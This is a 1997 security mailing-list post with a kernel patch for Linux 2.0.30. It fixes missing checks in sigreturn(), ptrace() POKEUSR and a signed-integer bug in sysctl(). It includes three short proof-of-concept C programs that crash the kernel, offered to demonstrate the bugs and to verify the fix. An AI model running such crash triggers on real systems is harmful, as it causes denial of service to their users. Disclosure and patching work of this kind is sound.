A fix for some 2.0.30 Oops

Solar Designer (solar@false.com)
Wed, 4 Jun 1997 15:40:20 -0300 (GMT+3)


Hello!

I finally fixed a few possibilities to generate an Oops in 2.0.30 that I
found last month: missing saved context checks in sigreturn(), missing
checks for POKEUSR in ptrace(), and a funny signed number bug in sysctl().

First here's some code to prove these really allow to get an Oops, and to
make sure the problems are gone with applying the patch:

--- sigreturn_bug.c ---

#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <asm/sigcontext.h>
#include <asm/segment.h>

struct sigcontext_struct *end;

void handler() {
struct sigcontext_struct *context;

asm("movl %%esp,%0" : "=m" (context));
while (context->cs != USER_CS && context < end) ((int *)context)++;

if (context->cs != USER_CS) {
puts("Context not found"); exit(0);
}

context->eip = -1;
}

main() {
asm("movl %%esp,%0" : "=m" (end));

signal(SIGUSR1, handler);
kill(getpid(), SIGUSR1);
}

--- ptrace_bug.c ---

#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>

main() {
int pid;

if ((pid = fork()) > 0) {
if (ptrace(PTRACE_ATTACH, pid, 0, 0)) perror("PTRACE_ATTACH");
waitpid(pid, NULL, WUNTRACED);
if (ptrace(PTRACE_POKEUSR, pid, 4*EIP, -1)) perror("PTRACE_POKEUSR");
if (ptrace(PTRACE_DETACH, pid, 0, 0)) perror("PTRACE_DETACH");
} else {
while (1);
}
}

--- sysctl_bug.c ---

#include <sys/sysctl.h>

main() {
sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
/* 0x80000000 can be replaced with 0xC0000000 -- both are negative, and
* produce a zero when multiplied by sizeof(int) */
}

There would also be a similar problem in getgroups() if gid_t was larger than
2 bytes long, this should be fixed if gid_t is changed some day.

Now to the patch. There might be a better way to do the checks in ptrace() --
by temporary setting the child's LDT, and using LAR and LSL instructions. The
reason I didn't do it is that it's a bit tricky, and I'm not sure if it would
be correct. As for sigreturn() -- unfortunately the extra checks slow signal
handling down a bit. However, there were some checks in there already, and
it's not a problem with my patch, but a problem with the idea of storing the
saved context on user stack. There should be some other solution, to prevent
from writing to the context instead of checking it before restoring. By the
way, some other systems have the same problem.

Almost forgot: the setrlimit() fix which is already in 2.0.30 doesn't seem to
be present in 2.1.x yet, users can still bypass their rlimits, hope this gets
fixed soon.

And here goes the patch:

diff -urX nopatch /extra/linux-2.0.30/arch/i386/kernel/ptrace.c linux/arch/i386/kernel/ptrace.c
--- /extra/linux-2.0.30/arch/i386/kernel/ptrace.c Wed Sep 11 11:57:13 1996
+++ linux/arch/i386/kernel/ptrace.c Wed Jun 4 13:39:57 1997
@@ -295,6 +295,60 @@
return 0;
}

+void safe_wake_up_process(struct task_struct * p)
+{
+ struct desc_struct * d;
+ unsigned long limit;
+
+ void check(int index, int mask, int value) {
+ unsigned long selector, limit;
+
+ if (!p) return;
+
+ selector = get_stack_long(p, sizeof(long)*index - MAGICNUMBER);
+ if (selector & 4) {
+ d = p->ldt;
+ if (d) limit = get_limit(p->tss.ldt); else limit = 0;
+ } else {
+ d = gdt;
+ limit = 8 * 8;
+ }
+
+ if ((selector & 0xFFF8) >= limit) {
+ d = NULL;
+ force_sig(SIGSEGV, p); p = NULL;
+ } else {
+ d += selector >> 3;
+ if ((d->b & mask) != value ||
+ (d->b >> 13) < (selector & 3)) {
+ force_sig(SIGSEGV, p); p = NULL;
+ }
+ }
+ }
+
+ check(DS, 0x9800, 0x9000); /* Allow present data segments only */
+ check(ES, 0x9800, 0x9000);
+ check(FS, 0x9800, 0x9000);
+ check(GS, 0x9800, 0x9000);
+ check(SS, 0x9A00, 0x9200); /* Stack segment should not be read-only */
+ check(CS, 0x9800, 0x9800); /* Allow present code segments only */
+
+ if (!p) return;
+
+ if (d) {
+ limit = (d->a & 0xFFFF) | (d->b & 0xF0000);
+ if (d->b & 0x800000) {
+ limit <<= 12; limit |= 0xFFF;
+ }
+
+ if (get_stack_long(p, sizeof(long)*EIP - MAGICNUMBER) > limit) {
+ force_sig(SIGSEGV, p); return;
+ }
+ }
+
+ wake_up_process(p);
+}
+
asmlinkage int sys_ptrace(long request, long pid, long addr, long data)
{
struct task_struct *child;
@@ -467,7 +521,7 @@
else
child->flags &= ~PF_TRACESYS;
child->exit_code = data;
- wake_up_process(child);
+ safe_wake_up_process(child);
/* make sure the single step bit is not set. */
tmp = get_stack_long(child, sizeof(long)*EFL-MAGICNUMBER) & ~TRAP_FLAG;
put_stack_long(child, sizeof(long)*EFL-MAGICNUMBER,tmp);
@@ -500,8 +554,8 @@
child->flags &= ~PF_TRACESYS;
tmp = get_stack_long(child, sizeof(long)*EFL-MAGICNUMBER) | TRAP_FLAG;
put_stack_long(child, sizeof(long)*EFL-MAGICNUMBER,tmp);
- wake_up_process(child);
child->exit_code = data;
+ safe_wake_up_process(child);
/* give it a chance to run. */
return 0;
}
@@ -512,8 +566,8 @@
if ((unsigned long) data > NSIG)
return -EIO;
child->flags &= ~(PF_PTRACED|PF_TRACESYS);
- wake_up_process(child);
child->exit_code = data;
+ safe_wake_up_process(child);
REMOVE_LINKS(child);
child->p_pptr = child->p_opptr;
SET_LINKS(child);
diff -urX nopatch /extra/linux-2.0.30/arch/i386/kernel/signal.c linux/arch/i386/kernel/signal.c
--- /extra/linux-2.0.30/arch/i386/kernel/signal.c Wed Dec 11 11:41:01 1996
+++ linux/arch/i386/kernel/signal.c Wed Jun 4 12:32:37 1997
@@ -15,6 +15,7 @@
#include <linux/ptrace.h>
#include <linux/unistd.h>

+#include <asm/system.h>
#include <asm/segment.h>

#define _S(nr) (1<<((nr)-1))
@@ -80,13 +81,40 @@
asmlinkage int sys_sigreturn(unsigned long __unused)
{
#define COPY(x) regs->x = context.x
+#define CHECK_DATA(x, mask, value) \
+__asm__("larw %0,%%ax\n\t" \
+ "jnz asm_badframe\n\t" \
+ "andl $" mask ",%%eax\n\t" \
+ "cmpl $" value ",%%eax\n\t" \
+ "jne asm_badframe" \
+ : \
+ : "g" (context.x) \
+ : "ax", "cc");
+#define CHECK_CODE(x, y) \
+__asm__("larw %0,%%ax\n\t" \
+ "jnz asm_badframe\n\t" \
+ "andl $0x9800,%%eax\n\t" \
+ "cmpl $0x9800,%%eax\n\t" /* Allow present code segments only */ \
+ "jne asm_badframe\n\t" \
+ "lsll %0,%%eax\n\t" \
+ "cmp %1,%%eax\n\t" /* Check context.eip against the segment limit */ \
+ "jb asm_badframe" \
+ : \
+ : "g" (context.x), "g" (context.y) \
+ : "ax", "cc");
#define COPY_SEG(x) \
+CHECK_DATA(x, "0x9800", "0x9000") /* Allow present data segments only */ \
if ( (context.x & 0xfffc) /* not a NULL selectors */ \
&& (context.x & 0x4) != 0x4 /* not a LDT selector */ \
&& (context.x & 3) != 3 /* not a RPL3 GDT selector */ \
) goto badframe; COPY(x);
-#define COPY_SEG_STRICT(x) \
+#define COPY_STACK(x) \
+CHECK_DATA(x, "0x9A00", "0x9200") /* Stack segment should not be read-only */ \
if (!(context.x & 0xfffc) || (context.x & 3) != 3) goto badframe; COPY(x);
+#define COPY_CODE(x, y) \
+CHECK_CODE(x, y) \
+if (!(context.x & 0xfffc) || (context.x & 3) != 3) goto badframe; \
+COPY(x); COPY(y);
struct sigcontext_struct context;
struct pt_regs * regs;

@@ -99,9 +127,8 @@
COPY_SEG(es);
COPY_SEG(fs);
COPY_SEG(gs);
- COPY_SEG_STRICT(ss);
- COPY_SEG_STRICT(cs);
- COPY(eip);
+ COPY_STACK(ss);
+ COPY_CODE(cs, eip);
COPY(ecx); COPY(edx);
COPY(ebx);
COPY(esp); COPY(ebp);
@@ -117,6 +144,11 @@
}
return context.eax;
badframe:
+ do_exit(SIGSEGV);
+}
+
+void asm_badframe(void)
+{
do_exit(SIGSEGV);
}

diff -urX nopatch /extra/linux-2.0.30/kernel/sysctl.c linux/kernel/sysctl.c
--- /extra/linux-2.0.30/kernel/sysctl.c Sat Apr 19 20:43:22 1997
+++ linux/kernel/sysctl.c Mon Jun 2 23:05:52 1997
@@ -180,7 +180,7 @@
struct ctl_table_header *tmp;
void *context;

- if (nlen == 0 || nlen >= CTL_MAXNAME)
+ if (nlen <= 0 || nlen >= CTL_MAXNAME)
return -ENOTDIR;

error = verify_area(VERIFY_READ,name,nlen*sizeof(int));

Signed,
Solar Designer